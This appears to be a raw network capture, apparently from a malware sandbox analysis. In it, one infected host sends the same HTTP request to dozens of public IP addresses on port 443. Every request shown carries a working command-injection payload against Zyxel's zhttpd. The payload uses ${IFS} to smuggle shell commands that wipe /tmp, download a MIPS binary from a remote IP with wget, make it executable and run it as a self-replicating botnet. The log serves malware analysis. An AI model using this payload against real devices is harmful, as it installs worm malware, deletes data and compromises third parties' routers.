                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.068475962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6156192.168.2.134897838.219.146.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.068542004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6157192.168.2.133693844.36.241.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.068613052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6158192.168.2.1348950163.206.137.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.068682909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6159192.168.2.1349232146.16.69.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.068734884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6160192.168.2.1353480169.1.145.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.068803072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6161192.168.2.1357948198.158.107.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.068877935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6162192.168.2.1337174208.140.170.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.068953037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6163192.168.2.133764432.0.125.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.069005966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6164192.168.2.133955245.198.180.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.069065094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6165192.168.2.134285035.160.132.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.069139957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6166192.168.2.1341572142.179.157.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.069214106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6167192.168.2.1344236111.124.133.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.069277048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6168192.168.2.1343676185.231.156.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.069353104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6169192.168.2.1335580159.246.233.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.069423914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6170192.168.2.134456627.252.120.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.069499969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6171192.168.2.1336882145.68.44.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.069575071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6172192.168.2.1335204101.43.136.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.069655895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6173192.168.2.1354346198.218.192.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.069690943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6174192.168.2.134855677.242.65.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.069756031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6175192.168.2.1354948160.70.154.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.069824934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6176192.168.2.13356522.135.190.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.069894075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6177192.168.2.135419039.169.1.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.069962025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6178192.168.2.134651214.225.245.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.070035934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6179192.168.2.1338366161.79.16.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.070108891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6180192.168.2.1350996103.122.104.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.070182085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6181192.168.2.1341488107.141.213.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.070251942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6182192.168.2.1336374145.72.167.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.070318937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6183192.168.2.135443047.218.30.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.070382118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6184192.168.2.1359200149.151.41.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.070461988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6185192.168.2.135221093.174.136.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.070494890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6186192.168.2.134720871.117.203.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.070571899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6187192.168.2.134354452.44.171.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.070643902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6188192.168.2.1344906211.24.5.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.070719004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6189192.168.2.134923887.153.202.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.070797920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6190192.168.2.1338168212.203.71.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.070853949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6191192.168.2.135130839.71.125.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.070919037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6192192.168.2.1336644116.118.65.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.070990086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6193192.168.2.1350200167.45.133.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.071064949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6194192.168.2.1358148155.191.76.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.071120024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6195192.168.2.1353132157.242.45.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.071190119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6196192.168.2.1346296174.118.198.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.071302891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6197192.168.2.133501285.184.119.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.071329117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6198192.168.2.1353736191.238.78.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.071388006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6199192.168.2.1337158156.40.112.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.071465969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6200192.168.2.133722498.33.26.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.071526051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6201192.168.2.134317087.100.54.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.071593046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6202192.168.2.1338110129.209.55.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.071654081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6203192.168.2.1349094107.81.199.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.071723938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6204192.168.2.1358330211.10.178.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.071789980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6205192.168.2.1337716211.70.101.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.071856976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6206192.168.2.1332826221.165.144.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.071923018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6207192.168.2.133597684.122.238.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.072006941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6208192.168.2.134711874.1.3.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.072061062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6209192.168.2.1336804129.241.24.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.072124958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6210192.168.2.1333760201.24.142.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.072208881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6211192.168.2.1355048104.2.215.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.072253942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6212192.168.2.1347528136.246.21.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.072335005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6213192.168.2.1348828126.142.205.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.072408915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6214192.168.2.1347236219.47.95.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.072446108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6215192.168.2.1334458118.120.109.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.072525024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6216192.168.2.135689897.200.188.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.072596073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6217192.168.2.1357336198.63.99.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.072669029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6218192.168.2.1353392156.243.215.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.072768927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6219192.168.2.1335972208.10.163.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.072832108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6220192.168.2.134260868.245.159.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.072886944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6221192.168.2.1351640179.195.219.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.072969913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6222192.168.2.134951894.112.201.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.073031902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6223192.168.2.1348530221.141.223.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.073097944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6224192.168.2.13401921.192.218.141443
                              TimestampBytes transferredDirectionData
